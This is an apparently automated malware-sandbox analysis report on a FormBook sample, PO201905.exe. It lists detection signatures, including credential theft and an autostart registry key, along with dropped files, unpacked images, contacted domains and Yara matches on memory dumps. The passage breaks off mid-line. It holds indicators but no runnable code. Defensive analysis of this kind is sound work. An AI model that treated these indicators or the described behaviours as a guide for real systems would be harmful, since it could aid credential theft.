FormBook malware detected 17->52 54 Creates an undocumented autostart registry key 17->54 56 Tries to steal Mail credentials (via file access) 17->56 58 2 other signatures 17->58 25 firefox.exe 1 17->25         started        28 cmd.exe 17->28         started        signatures12 process13 file14 34 C:\Users\user\AppData\...\KM3logrf.ini, data 25->34 dropped

Simulations

Behavior and APIs

TimeTypeDescription
21:16:47API Interceptor5290x Sleep call for process: PO201905.exe modified
21:24:53API Interceptor120x Sleep call for process: explorer.exe modified

Antivirus and Machine Learning Detection

Initial Sample

SourceDetectionScannerLabelLink
PO201905.exe16%virustotalBrowse
PO201905.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe100%Joe Sandbox ML
C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe100%Joe Sandbox ML
C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe16%virustotalBrowse

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
12.1.9rxlgd1bcduf.exe.1060000.0.unpack100%Joe Sandbox MLDownload File
0.1.PO201905.exe.fb0000.0.unpack100%Joe Sandbox MLDownload File
12.0.9rxlgd1bcduf.exe.1060000.0.unpack100%Joe Sandbox MLDownload File
0.2.PO201905.exe.fb0000.3.unpack100%Joe Sandbox MLDownload File
0.0.PO201905.exe.fb0000.0.unpack100%Joe Sandbox MLDownload File

Domains

SourceDetectionScannerLabelLink
www.dazhen.ltd.w.kunlunsl.com0%virustotalBrowse
www.dazhen.ltd0%virustotalBrowse

URLs

No Antivirus matches

Yara Overview

Initial Sample

SourceRuleDescriptionAuthor
PO201905.exeEmbedded_PEunknownunknown

PCAP (Network Traffic)

No yara matches

Dropped Files

SourceRuleDescriptionAuthor
C:\Program Files\Fppxlgn\9rxlgd1bcduf.exeEmbedded_PEunknownunknown
C:\Program Files\Fppxlgn\9rxlgd1bcduf.exeEmbedded_PEunknownunknown

Memory Dumps

SourceRuleDescriptionAuthor
00000006.00000000.4489812531.05280000.00000002.sdmpEmbedded_PEunknownunknown
00000006.00000000.4489859117.053A0000.00000008.sdmpEmbedded_PEunknownunknown
0000000C.00000000.4605949292.01060000.00000002.sdmpEmbedded_PEunknownunknown
00000006.00000000.4499027121.02FD0000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4499136614.03160000.00000008.sdmpEmbedded_PEunknownunknown
0000000C.00000001.4606191992.01060000.00000002.sdmpEmbedded_PEunknownunknown
00000006.00000000.4483829349.021F0000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4489594683.04FD0000.00000002.sdmpEmbedded_PEunknownunknown
00000006.00000000.4483813760.021E0000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4481973939.000D0000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4483543065.01C90000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4489196294.04B80000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4482978785.00960000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4485301200.02FD0000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4485257832.02F00000.00000008.sdmpEmbedded_PEunknownunknown
00000000.00000002.4520123297.025C0000.00000040.sdmpEmbedded_PEunknownunknown
00000000.00000002.4518783364.00FBA000.00000040.sdmpEmbedded_PEunknownunknown
00000006.00000000.4483012656.009B0000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4496745744.01F30000.00000008.sdmpEmbedded_PEunknownunknown
00000000.00000002.4518101641.00200000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4496645451.01C90000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4485383734.03160000.00000008.sdmpEmbedded_PEunknownunknown
00000000.00000000.3459785508.00FB0000.00000002.sdmpEmbedded_PEunknownunknown
00000006.00000000.4485420844.03230000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4495827412.00730000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4489866128.053E0000.00000008.sdmpEmbedded_PEunknownunknown
00000000.00000002.4518759786.00FB0000.00000002.sdmpEmbedded_PEunknownunknown
00000006.00000000.4496873251.020D0000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4489753137.051E0000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4489219800.04C00000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4498956019.02F00000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4495226765.000D0000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4483619954.01F30000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4498910122.02E40000.00000008.sdmpEmbedded_PEunknownunknown
0000000C.00000002.4699103178.000E0000.00000008.sdmpEmbedded_PEunknownunknown
00000000.00000003.4480049922.00B60000.00000004.sdmpEmbedded_PEunknownunknown
00000006.00000000.4489600354.04FE0000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4498921613.02E50000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4489914928.05460000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4482006795.00120000.00000008.sdmpEmbedded_PEunknownunknown
00000000.00000002.4518066485.000F0000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4496065227.00960000.00000008.sdmpEmbedded_PEunknownunknown
00000000.00000001.3460208049.00FB0000.00000002.sdmpEmbedded_PEunknownunknown
00000006.00000000.4489653245.050E0000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4482163480.00340000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4499198783.03230000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4495408457.00340000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4485235319.02E50000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4495818939.00720000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4483709645.020D0000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4482523631.00720000.00000008.sdmpEmbedded_PEunknownunknown
00000000.00000003.4508449289.00256000.00000004.sdmpEmbedded_PEunknownunknown
00000006.00000000.4499267957.03330000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4496687348.01D70000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4485229761.02E40000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4485325684.03030000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4496894367.020E0000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4499078335.03090000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4497202502.021F0000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4495256653.00120000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4496097002.009B0000.00000008.sdmpEmbedded_PEunknownunknown
0000000C.00000002.4700605804.000F0000.00000008.sdmpEmbedded_PEu